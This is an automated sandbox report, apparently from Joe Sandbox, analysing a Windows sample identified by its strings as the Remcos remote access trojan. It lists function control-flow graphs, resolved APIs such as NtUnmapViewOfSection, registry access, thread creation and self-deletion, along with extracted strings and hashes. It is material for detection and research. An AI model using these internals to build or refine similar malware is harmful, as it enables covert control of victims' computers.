                                                                                                                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 79 40ec06-40ec1c call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 95 40ec21-40ec25 79->95 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 95->80 98 40ec27-40ec3d call 401fab call 4139e4 95->98 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 118 40ec79-40ec7b 109->118 121 40ec87-40ec9a call 401e65 call 401fab 118->121 122 40ec7d-40ec82 call 407773 call 40729b 118->122 121->108 141 40ec9c-40eca2 121->141 122->121 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 210 40ee8c 193->210 211 40ee7f-40ee8a call 436f10 193->211 203->178 217 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 210->217 211->217 217->234 288 40ef09-40ef1e call 401e65 call 41bcef call 40f4af 217->288 286 40f017-40f019 234->286 287 40effc 234->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 304 40ef23-40ef28 288->304 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 304->234 306 40ef2a 304->306 306->92 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 356 40f194-40f1a7 call 401e65 call 401fab 347->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 415 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->415 416 40f2c2-40f2c7 413->416 417 40f307-40f322 call 401fab call 41353a 413->417 415->417 416->415 417->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 417->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000104), ref: 0040EA29
                                                                                                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\LdSbZG1iH6.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                • API String ID: 2830904901-2885689382
                                                                                                                                                • Opcode ID: 18716b9a1f5ab38af75444c8baf80b949ed4f29a9b27fc25d1d1050251cb5535
                                                                                                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                                • Opcode Fuzzy Hash: 18716b9a1f5ab38af75444c8baf80b949ed4f29a9b27fc25d1d1050251cb5535
                                                                                                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                                                                                                Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 494 41c0ac-41c0cf lstrlenW 495 41c0d1-41c0d3 494->495 496 41c10a-41c140 call 436990 FindFirstVolumeW 494->496 497 41c0d7-41c0e9 call 43706a 495->497 502 41c1c7-41c1dd call 43bb56 496->502 503 41c146-41c14e GetLastError 496->503 504 41c0f1-41c100 lstrlenW 497->504 505 41c0eb-41c0ef 497->505 511 41c153-41c158 502->511 512 41c1e3 502->512 507 41c1f9-41c203 503->507 504->496 510 41c102-41c106 504->510 505->504 508 41c108 505->508 508->496 510->497 511->512 514 41c15e-41c164 511->514 513 41c1e8-41c1f6 FindVolumeClose 512->513 513->507 514->512 515 41c166-41c16b 514->515 515->512 516 41c16d-41c172 515->516 516->512 517 41c174-41c196 QueryDosDeviceW 516->517 518 41c261-41c269 GetLastError 517->518 519 41c19c-41c1ad lstrcmpW 517->519 518->513 520 41c213-41c239 GetVolumePathNamesForVolumeNameW 519->520 521 41c1af-41c1c5 FindNextVolumeW 519->521 520->518 523 41c23b-41c25f lstrcatW lstrcpyW 520->523 521->502 522 41c204-41c20f GetLastError 521->522 522->513 524 41c211 522->524 523->513 524->512
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                                • FindFirstVolumeW.KERNELBASE(?,00000104,?), ref: 0041C133
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                                • lstrcmpW.KERNELBASE(?,?), ref: 0041C1A5
                                                                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                                • GetVolumePathNamesForVolumeNameW.KERNELBASE(?,?,?,?), ref: 0041C231
                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                • String ID: ?
                                                                                                                                                • API String ID: 3941738427-1684325040
                                                                                                                                                • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                                                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                                • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                                                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                                Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00404E43
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                                                                                                                • closesocket.WS2_32(?), ref: 00404E5A
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00404EA2
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00404EBA
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00404ED1
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 3658366068-263838557
                                                                                                                                                • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                                                                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                                • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                                                                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                                                                                Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00413656: RegOpenKeyExW.KERNELBASE(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                                                                                                  • Part of subcall function 00413656: RegQueryValueExW.KERNELBASE(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                  • Part of subcall function 00413656: RegCloseKey.KERNELBASE(?), ref: 004136A0
                                                                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                • API String ID: 37874593-122982132
                                                                                                                                                • Opcode ID: 18828d22db6dc901264db0d68ca479bae690019708f44dbb349cd718a6751edd
                                                                                                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                • Opcode Fuzzy Hash: 18828d22db6dc901264db0d68ca479bae690019708f44dbb349cd718a6751edd
                                                                                                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                • API String ID: 1866151309-2070987746
                                                                                                                                                • Opcode ID: c98b1087101755a38b82246d9aa98e7144fe1c3d7bc526724a740bbc80c710b4
                                                                                                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                                • Opcode Fuzzy Hash: c98b1087101755a38b82246d9aa98e7144fe1c3d7bc526724a740bbc80c710b4
                                                                                                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                                Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 731 448319-448330 GetLastError 732 448332-44833c call 44883c 731->732 733 44833e-448345 call 445b74 731->733 732->733 738 44838f-448396 SetLastError 732->738 737 44834a-448350 733->737 739 448352 737->739 740 44835b-448369 call 448892 737->740 742 448398-44839d 738->742 743 448353-448359 call 446802 739->743 747 44836e-448384 call 448107 call 446802 740->747 748 44836b-44836c 740->748 749 448386-44838d SetLastError 743->749 747->738 747->749 748->743 749->742
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                                                                                                                • _free.LIBCMT ref: 00448353
                                                                                                                                                • _free.LIBCMT ref: 0044837A
                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00448387
                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00448390
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                Function 0041C26E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 754 41c26e-41c290 OpenProcess 755 41c292-41c2a3 OpenProcess 754->755 756 41c2ac-41c2c2 K32GetProcessImageFileNameW 754->756 755->756 757 41c2a5-41c2aa 755->757 758 41c2c4-41c2ca CloseHandle 756->758 759 41c2cc-41c2d8 CloseHandle call 41c0ac 756->759 760 41c2e4-41c2f3 call 40417e 757->760 758->757 763 41c2dd-41c2e3 759->763 763->760
                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2951400881-0
                                                                                                                                                • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                                                                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                                                • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                                                                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                                                Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 765 4137aa-4137c1 RegCreateKeyA 766 4137c3-4137f8 call 40247c call 401fab RegSetValueExA RegCloseKey 765->766 767 4137fa 765->767 769 4137fc-41380a call 401fd8 766->769 767->769
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                                                                • RegSetValueExA.KERNELBASE(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                                                                                                • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                • String ID: Control Panel\Desktop
                                                                                                                                                • API String ID: 1818849710-27424756
                                                                                                                                                • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                                • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                                Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 783 4485e6-4485fa 784 448607-448622 LoadLibraryExW 783->784 785 4485fc-448605 783->785 787 448624-44862d GetLastError 784->787 788 44864b-448651 784->788 786 44865e-448660 785->786 789 44863c 787->789 790 44862f-44863a LoadLibraryExW 787->790 791 448653-448654 FreeLibrary 788->791 792 44865a 788->792 793 44863e-448640 789->793 790->793 791->792 794 44865c-44865d 792->794 793->788 795 448642-448649 793->795 794->786 795->794
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                                • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                                Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
